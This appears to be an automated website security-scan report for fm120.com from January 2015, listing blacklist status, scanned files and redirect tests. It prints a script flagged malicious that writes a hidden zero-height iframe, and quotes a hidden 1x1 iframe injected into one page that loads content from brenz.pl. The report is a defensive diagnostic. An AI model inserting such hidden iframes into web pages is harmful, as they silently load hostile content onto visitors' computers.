Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=fm120.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://fm120.com/ | HTTP/1.1 200 OK Date: Wed, 14 Jan 2015 08:50:41 GMT Accept-Ranges: bytes ETag: "133748bcc42fd01:42b" Server: Microsoft-IIS/6.0 Content-Length: 169944 Content-Location: http://fm120.com/index.htm Content-Type: text/html Last-Modified: Wed, 14 Jan 2015 06:38:41 GMT X-Powered-By: ASP.NET | clean |
http://fm120.com/index.htm | 200 OK Content-Length: 169944 Content-Type: text/html | clean |
http://fm120.com/js08/fun.js | 200 OK Content-Length: 1768 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function checkform()
{ var theForm = document.forms[1]; if(theForm.TextUid.value=="") { alert('ÇëÊäÈëµÇ½êdzÆ'); return false; } if(theForm.TextPwd.value=="") { alert('ÇëÊäÈëµÇ½ÃÜÂë'); return false;} return true; } function showMM(num){ var num="MM"+num; document.getElementById(num).style.display="block"; } function hideMM(num){ var num="MM"+num; document.getElementById(num).style.display="none"; } < if (!document.getElementById(elm)) return; var str = ''; str += '<embed width="'+ w +'" height="'+ h +'" src="'+ url +'" quality="autohigh" wmode="transparent" type="application/x-shockwave-flash" plugspace="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" id='+id+'></embed>'; document.getElementById(elm).innerHTML = str; } document.write("<iframe width='100' height='0' src=''></iframe>"); Antivirus reports:
| ||
http://fm120.com/js/huandeng.js | 200 OK Content-Length: 1678 Content-Type: application/x-javascript | clean |
http://fm120.com/fm120_js08/test_hbs.js | 200 OK Content-Length: 7895 Content-Type: application/x-javascript | clean |
http://fm120.com/js/fm120.js | 200 OK Content-Length: 3472 Content-Type: application/x-javascript | clean |
http://fm120.com/js/fm120_1.js | 200 OK Content-Length: 6139 Content-Type: application/x-javascript | clean |
http://fm120.com/js/health_test.js | 200 OK Content-Length: 4467 Content-Type: application/x-javascript | clean |
http://fm120.com/Class/Guangdong_news/ | HTTP/1.1 200 OK Date: Wed, 14 Jan 2015 08:50:55 GMT Accept-Ranges: bytes ETag: "70fcdb5592fd01:42b" Server: Microsoft-IIS/6.0 Content-Length: 9108 Content-Location: http://fm120.com/Class/Guangdong_news/index.htm Content-Type: text/html Last-Modified: Tue, 13 Jan 2015 08:17:13 GMT X-Powered-By: ASP.NET | clean |
http://fm120.com/class/guangdong_news/index.htm | 200 OK Content-Length: 9108 Content-Type: text/html | clean |
http://www.fm120.com/Class/wst_images/sohuflash_1.js | 200 OK Content-Length: 7442 Content-Type: application/x-javascript | clean |
http://www.fm120.com/news/2009top_wst.js | 200 OK Content-Length: 10082 Content-Type: application/x-javascript | clean |
http://www.fm120.com/fm120_js/feeter.js | 200 OK Content-Length: 1756 Content-Type: application/x-javascript | clean |
http://fm120.com/Class/Guangdong_news/../../ | HTTP/1.1 200 OK Date: Wed, 14 Jan 2015 08:51:04 GMT Accept-Ranges: bytes ETag: "133748bcc42fd01:42b" Server: Microsoft-IIS/6.0 Content-Length: 169944 Content-Location: http://fm120.com/index.htm Content-Type: text/html Last-Modified: Wed, 14 Jan 2015 06:38:41 GMT X-Powered-By: ASP.NET | clean |
http://fm120.com/test404page.js | 404 Not Found Content-Length: 1308 Content-Type: text/html | clean |
http://fm120.com/Class/Guangdong_news/../news/ | HTTP/1.1 200 OK Date: Wed, 14 Jan 2015 08:51:07 GMT Accept-Ranges: bytes ETag: "b07e367db2fd01:42b" Server: Microsoft-IIS/6.0 Content-Length: 13383 Content-Location: http://fm120.com/Class/news/index.htm Content-Type: text/html Last-Modified: Tue, 13 Jan 2015 08:32:38 GMT X-Powered-By: ASP.NET | clean |
http://fm120.com/class/news/index.htm | 200 OK Content-Length: 13383 Content-Type: text/html | clean |
http://fm120.com/class/news/../../ | HTTP/1.1 200 OK Date: Wed, 14 Jan 2015 08:51:11 GMT Accept-Ranges: bytes ETag: "133748bcc42fd01:42b" Server: Microsoft-IIS/6.0 Content-Length: 169944 Content-Location: http://fm120.com/index.htm Content-Type: text/html Last-Modified: Wed, 14 Jan 2015 06:38:41 GMT X-Powered-By: ASP.NET | clean |
http://fm120.com/Class/Guangdong_news/../news/../../content/2014-6/19/102842.html | 200 OK Content-Length: 8209 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 1x1 src: http://www.brenz.pl/rc/ <iframe style="height:1px" src="http://www.brenz.pl/rc/" frameborder=0 width=1> | ||
http://fm120.com/img200702/top.js | 200 OK Content-Length: 10106 Content-Type: application/x-javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: fm120.com
Result:
HTTP/1.1 200 OK
Date: Wed, 14 Jan 2015 08:50:41 GMT
Accept-Ranges: bytes
ETag: "133748bcc42fd01:42b"
Server: Microsoft-IIS/6.0
Content-Length: 169944
Content-Location: http://fm120.com/index.htm
Content-Type: text/html
Last-Modified: Wed, 14 Jan 2015 06:38:41 GMT
X-Powered-By: ASP.NET
...169944 bytes of data.
GET / HTTP/1.1
Host: fm120.com
Result:
HTTP/1.1 200 OK
Date: Wed, 14 Jan 2015 08:50:41 GMT
Accept-Ranges: bytes
ETag: "133748bcc42fd01:42b"
Server: Microsoft-IIS/6.0
Content-Length: 169944
Content-Location: http://fm120.com/index.htm
Content-Type: text/html
Last-Modified: Wed, 14 Jan 2015 06:38:41 GMT
X-Powered-By: ASP.NET
...169944 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: fm120.com
Referer: http://www.google.com/search?q=fm120.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: fm120.com
Referer: http://www.google.com/search?q=fm120.com
Result:
The result is similar to the first query. There are no suspicious redirects found.